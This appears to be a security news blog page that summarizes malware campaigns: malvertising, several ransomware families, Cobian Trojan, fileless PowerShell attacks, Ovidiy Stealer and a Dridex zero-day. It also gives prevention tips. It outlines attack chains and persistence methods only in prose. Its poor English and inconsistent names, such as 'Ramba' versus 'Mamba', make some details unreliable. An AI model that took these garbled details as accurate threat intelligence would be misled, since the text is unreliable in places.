Malware Advertising Campaign Reached High-Profile Website Visitors

Today’s the biggest threats to computer system and user’s privacy is malware, that of be any kind like Trojan, Ransomware, Browser Hijacker and much like that. Hackers or cyber criminals never take rest or miss an opportunity to bother you. Malware experts recently noticed yet another kind of malware variants known to be malvertising, which is techniques to spread malware to online visitors. The process involve seeding ad networks with the harmful online Malware Advertising Campaignadvertisements after which they appears onto your visiting webpage with motive to delivering malware to a person’s computer. Experts classified this as insidious type of attack as one merely has view an advertisement in order to become infected and mainly it happens if their computer has a software vulnerability.

In recent time a number of high-profile websites, including Java.com, TMZ.com and IBTimes.com, become the victims of malware advertising campaign which spread malware to online visitors. Recent malvertising campaigns were discovered by the two security research firms. This highlight the threat of fake and legitimate but there are poorly managed. Advertising networks mainly infect victims via taking advantage of redirected web traffic. According to report by Fox-IT, at least eight to ten websites were found hosting the poisoned ads. These includes Photobucket.com, Kapaza.be, Tvgids.nl, EBay.ie, and Deviantart.com among the group of targeted sites.

Source:- https://www.scmagazine.com/malvertising-campaign-uses-fake-ad-networks/article/570424/

Malwarebytes Reports says one of the campaigns create fake advertising networks on high-trafficked adult website that being registered via the proxy. The campaign, dubbed as HookAds, which always redirected the targets user to Malware Advertising Campaignspoofed adult webpages to spread malware. Now the secondary decoy adult websites attempt to serve RIG and the Neutrino EK exploit kits in order to inject payloads.

Malware advertising campaign involves injecting malicious advertisements into the legitimate online advertising networks and webpages. Undoubtedly Malvertising is new concept for spreading malware and the more interesting does not require any user action like clicking on the ads to compromise the system. Moreover, malvertising does not exploit any vulnerabilities onto the website or server from where it is hosted from. Its infection silently travel through Web page advertisements.

Malvertising, or say Malware Advertising Campaign is extremely new and effective way to target and infect large number of computer system within short period of time. In a talk with SC Media Malwarebytes Lead Malware Intelligence Analyst Jérôme Segura told that Malware Advertising Campaign campaign began in the mid-August or the earlier. He further said, about one million visitors to the adult websites were exposed to malvertising campaign, additionally he stated “we don’t know that all were infected.”

References:- https://www.scmagazine.com/malicious-ads-impact-javacom-tmz-and-photobucket-site-visitors-firm-finds/article/539542/

Computer system being infected with any kind of malicious program is truly painful as it completely hampers your computer activities, both the online and offline. Program such as Malvertising are too dangerous and worst even with clicking onto ads they gets inside your PC. The ad is loaded by the user’s browser. Well, malware advertising campaign reached high-profile website visitors but one need to be more cautious while browsing. Security experts suggested users to disable any kind of browser plug-ins that barely used. Also to make sure they are updated in order to prevent similar attacks from occurring.

Cobian Trojan Offer Free Kit On Underground Forums

Hackers are trying all the possible way to sneak into your system. From creating an app to introducing you offer on emails they will try maximum possibilities to fool you and to enter into your system. They just use your source against you, and you are like nowhere to understand it. Being a cyber experts we strongly recommend that not to counter such mails and malicious application you get over the internet. Recently a malware name Cobian Trojan is been surfaced on Internet and mostly used by the hacker as a weapon for the attack. Some report clearly mentioned that the threat is going through several underground markets for free and used by hacker for deceptive method.

Cobian Trojan code is much similar to a Trojan Worm virus which was surfaced on dark Web for almost four year ago. It cover all the demand for a hacker to unlock a system, it’s like bells and whistles for the cyber criminals which some creepy features like webcam hijacker, a kerlogger, screen capturing ability and moreover make the criminal free to run it’s own code on compromised system. The irony is you will be helpless once cyber hacker will introduce such hacking tool to your system. For sure Cobian Trojan is some advance virus capable for invading whole computer network and mess with th whole settings. It can easily bypass all the security barrier and enter into the system in various way.

Continue reading

EV Ransomware Targeting WordPress : Attack On Rise

According to researchers, a new computer malware is found attacking WordPress sites across the globe. It is concluded that a ransomware variant namely EV ransomware have emerged that is designed to target only WordPress sites of the clients. Studies say that malware only aims to lock out WordPress page and deny access of its client thus demands its publishers to pay a sum of money. Paying sum of money guarantees restoration of files and access to it. The WordPress security researchers known as Wordfence team flagged several attempts by cyber crooks to upload virus with the ability to encrypt WordPress website’s file. The ransomware once loaded manages to compromise the website. This relatively new breed of ransomware holding WordPress website hostage and thus asking payment for the release. Estimations are that more than $5 million dollar is extorted from the victim each year by ransomware. Yet, cyber security team is encouraging victims not to pay ransom. This is possibly because of two reasons : first, there is not guarantee, your data will be returned and second it further encourages extortionist to continue ransomware attacks.

Continue reading

SyncCrypt Ransomware Is Globally Distributed Through Spam Wave

A massive growth in ransomware attack has been seen in 2017 and SyncCrypt ransomware is one of them. It is one of the complicated file encrypting threat which was first detected by a researcher of Emisoft in last week of August 2017. The infection report and sample of this malware reveal that it is a dangerous threat and users must take it seriously. The rate in which this ransomware is propagated via worldwide spam is also a matter of concern. According to cyber security researchers, it is one of those ransomware which has the ability to create lots of money because it not only encrypt user’s data, it can also encode system data as well. The cyber crooks behind this ransomware are using different social engineering tricks so that the targeted user will infect their system themselves with SyncCrypt code.Continue reading

Mamba Ransomware Attack: Targeting Hard Disk Instead of Files

Now Days a New Ransomware is rising name “Mamba Ransomware” that paralyzes the target computer and does not allow the user to access the desktop and files. The Mamba that was the first example of ransomware that encrypts hard drives rather than files that was detected in public attack, primarily targeted organizations in Brazil and the Municipal Transportation Agency from San Francisco. It is variant of the disk-encryption ransomware that was first observed in early November of 2016. Unlike the Petya Ransomware that encrypts the Master File Table (MFT) record to revoke access to the data, the Mamba Ransomware uses disk-level encryption. The ransomware is reported to run as ‘DiskCryptor’ process on the compromised PC.

The Ramba Ransomware propagation among users system are quite different, but it is likely that its operators are using malicious tools like Exploit Kit and spam mail loaded with Trojan Droppers. As stated above, the ransomware can lock the entire local drive and researchers are working on finding its vulnerabilities. The analysis is hindered by the full encryption which hides most of Mamba. The ransomware may run in the system background and encode files that are rarely accessed first. Then, the Mamba cryptomalware proceeds to lock other data and tightens its grip on the drive by encrypting the files you opened during your last session or on the next system boot. There are other variant of Mamba Ransomware like Black Mamba Ransomware.

Ramba Ransomware Designed To Destruct Corporates and Other large Organization’s

The security researchers informed that the person behind this attacks usually attacks Saudi Arabic and Brazil’s company offices and other corporate. It is also expected that the attack may be elaborate to other countries and regions as well.

The attackers behind the Mamba ransomware attacks leverages the PSEXEC utility to perform execute the threat on the corporate network once it has propagated. NotPetya uses the same PSEXEC tool to infiltrate within target networks. As Kaspersky, the ransomware uses a two phase infection pattern, in the first one cyber criminals drop the DiskCryptor tool into a new folder created by the malware. The persistence is obtained by registering a system service called DefragmentService, then the system is rebooted. The second phase sets up the new bootloader and encrypts disk partitions using DiskCryptor, then the machine is rebooted. This malware also generates a password for the DiskCrypto Utility for each machine in the targeted network and then finally ransomware utilizes the password that has been passed through command line argument as kaspersky.

After infiltration, the Ramba Ransomware modifies the system MBR to display the ransom note. The ransomware usually to show ransom note that instead of demanding for money like the original Mamba. Affected users are suggested to contact the threat actors on given two email addresses with an ID number. The provided email id is used to recover the encryption key.

As discussed above, Mamba ransomware follows the well-known attack vectors associated with prior versions. It uses a two-stage infection pattern that seeks to infiltrate the computer network first and make them worse. The motive of hackers is per-defined as lock the user’s hard disk and extort money to them. So it is highly recommended to follow prevention steps to avoid such malicious attack and future too.

Fileless Malware Attacks Against Organizations That Leaves No Signs Of Intrusion

A new malware has been identified by some malware researchers that infect 140 organizations around the world. This is called as Fileless Malware that injects secretly into the memory and then leaves no signs of intrusion. It makes its detection difficult. However some Russian based Kaspersky Lab have published a report that Fileless Malware stucks so many banks, governments and other Telecom companies of 40 countries, but it didn’t give these hackers any appropriate name.

Fileless Malware is a non malware attack that occurs when an hacker uses existing software, approved applications and authorized protocols to carry out malicious activities. These attacks can control their system, without downloading any malicious files. This is a variant of the malicious software because it exists in the computer’s memory called RAM and does not write to any part of computer’s files. It get installed on the hard drive where it can be dissolved by some security scans. The attackers just employed widely used system administration and security tools that includes PowerShell, Metasploit and Mimikatz to inject their malicious codes into their computer memory.

They hosted their operation on the poorly controlled country code top level domains as Gabon, the Central African Republic and Mail, the researcher states “The trick of using some domains is that they are free and missing Whois Information, after domain expiration”.

Here its given that the attackers used the Metasploit Framework, standard Windows utilities and unknown domains with no Whois information, this makes attribution almost impossible,” they conclude. The researchers also add that the groups with the most similar tactics, techniques and some procedures, are banking fraud crime groups GCMAN and Carbanak.

Highlights of Fileless Malware Attacks:-

  • When user visits any site using Firefox browser.
  • On website the Flash software is loaded.
  • This Flash invoked PowerShell, that is used as an Operating System Tool that is part of every Windows computer. It sends instructions by commands that resides in the memory.
  • This PowerShell get connects with the C&C (Command and Control) Server. It downloads a malicious PowerShell Script. Its code gets hide in the memory and steals all your passwords and other sensitive data from your system administrators. This information is sent to the attacker. At no point it get downloaded into the infected machine.

Then after Fileless Malware attackers obtains some passwords using standard utilities as Microsoft’s Command line scripting utility NETSH. This tool sends some compromised passwords from the victim’s computer to attacker’s C&C server. Here, attackers gain full access to the computer. Since it resides in the memory, so whenever any victims reboot their system, all traces of attack get disappear. It makes us so difficult to detect and investigate Fileless Malware, when its attack originated.

Prevention Tips For Fileless Malware Detection:-

Therefore, a Gartner Security Analyst Avivah Litan says that this Fileless Malware attacks are becoming more common and evade into most of the endpoint protection and detection tools. He advises the organizations to take following step, in order to prevent Fileless Malware attacks.

  • Patch Systems often to avoid some common vulnerabilities.
  • You should limit the use of system administrative tools as Microsoft PowerShell. Just access those tools that are based on the reasonable need.
  • Always invest in reputable companies products that adds protection against memory attacks.
  • Apparently, use application controls on endpoint computers, that ensures only an organizations approved applications.

Therefore, its highly recommended by IT Professionals and cyber security firms to stop inviting this vulnerable application into your system, and uninstall Fileless Malware timely and safely, to get prevent from its future attacks.

See More:-  Rootkit.Fileless.MTGenWin32.Trojan-Ransom.Filecoder.BO

Password Stealing Malware Ovidiy Stealer Sold for $7 On Russian Site

Today’s computer become an integral part of our daily life. Not only it helps in easing our work but also act as reliable storage media where we can store our important details including the credential data alike password, banking details and much like this. But what if these data are in danger? Yes, with the growing importance of computer system usage cyber crime is too tremendously increases in recent year. Some very few days back we had seen impact of WannaCry ransomware that created series of havoc and affected over lac of computer system across 150 countries. Recently, yet another dangerous PC threats not ransomware but also can’t be taken lightly named as Ovidiy Stealer detected by security experts.

Ovidiy Stealer

What is ‘Ovidiy Stealer’?

Ovidiy Stealer is a new lightweight, easy-to-use credential stealer which is primarily targeting the important passwords stored in your installed browsers. It been discovered after experts found that a Russia-speaking malware developer who is known by the name “TheBottle” started selling new infostealer under the name of Ovidiy Stealer. This very password stealing malware ‘Ovidiy Stealer’ sold for 450-750 Rubles ie $7-$13 on Russian site. Coming to its internal design then it’s being supported with slick UI, which include a management panel that makes its very easy to use the tool as well as tracking results. Moreover, the malware is written in .NET and currently is capable to affect the following browsing:- Google Chrome, FileZilla, Kometa, Amigo, Torch, Orbitum, and Opera.

Read More:- About Ransomware

Key Features of Ovidiy Stealer:-

Ovidiy Stealer are for sale on a Russian domain. The user who purchase have ability to access the web panel that provide easy-to-use graphical user interface for managing infected hosts. Some of the very notable features which are included are listed below:-

Detailed Log Files Collection:– Here, you can see all collected log files originating from the compromised hosts.

Template-based Web Panel:– Its web panel configuration module resembles to dangerous ransom-virus like Spora and other famous ransomware families.

Additional Modules Purchase:- This very tool allow the customers to pay for additional modules and the features through well-developed payment system. The service offered is called “RoboKassa” which support payment card transactions and some other services. Here the seller name is listed as “Ovidiy”.

Comments System:- With so much featuresm an addition functional features known as comments and feedback system is implemented which allows customers of Ovidiy Stealer to share their feedback.

Source:- Ovidiy Stealer Malware Sold on Russian SiteContinue reading

Dridex Trojan Uses New Zero-Day Exploit in Latest Attacks

Attackers are always active and they don’t miss any single chance to unarmed the valuable source. The battle between Dridex Trojan malware and Microsoft Office is always there, as mentioned above the attacker don’t miss the chance to harm a computer user. This Dridex Trojan uses new zero-day exploit in latest attacks to make it more complex for the computer user. The attack was all blend with a spam mails which contain malicious attachments of Microsoft Word Documents that make use of a vulnerability in the way that Microsoft handles such OLE2Link objects.

Microsoft OLE2Link Object : This Microsoft OLE2Link Object show an unspecified action which allow unauthenticated attacker ( Remote Attacker) to trigger arbitrary code on a system.

Continue reading

WannaCry Ransomware – Essential Mitigations Strategies

On May 12, an epidemic infection of a ransomware emerged named as WannaCry ransomware. Experts called it “the largest ransomware infection in the history” that targeted more than 200,000 computers across 150 countries. WannaCry ransomware launched to target millions of Windows system and crippled operations. The infection covered a wide region of Europe which ranged from Britain’s national public health service, the NHS, Telefonica, a telecom company in Spain, car manufacturers, to shipping giant Fedex, to Russian government servers. Also, millions of average computer users fell victims to this cyber attack. However, security experts said that main targets of ransomware appeared to be in Russia, Ukraine and Taiwan but the ransomware includes localized translations in almost 28 languages i.e, from Bulgarian to Vietnamese.

Continue reading

Latest SamSam Ransomware Attack Demands $33,000 From Victim

Ransomware attack has become common in past year and SamSam Ransomware has start a new trend of such attacks. The ransomware first arise in year 2016 and affected all kind of organization as well as individual user. But the ransomware has active once again with more perilous features. According to malware researchers the ransomware comes with new demand and now it is asking for $33,000 to release the encrypted files. The updated variant of SamSam Ransomware is also different from other ransomware because its attacker generate the RSA key pair and upload public key with ransomware on the targeted computer. Underestimating this threat is not good because in April 2017 a hospital was attacked by this threat and they refuse to pay the ransom. As a result it take more than a month to fully restore the system of hospital.

Continue reading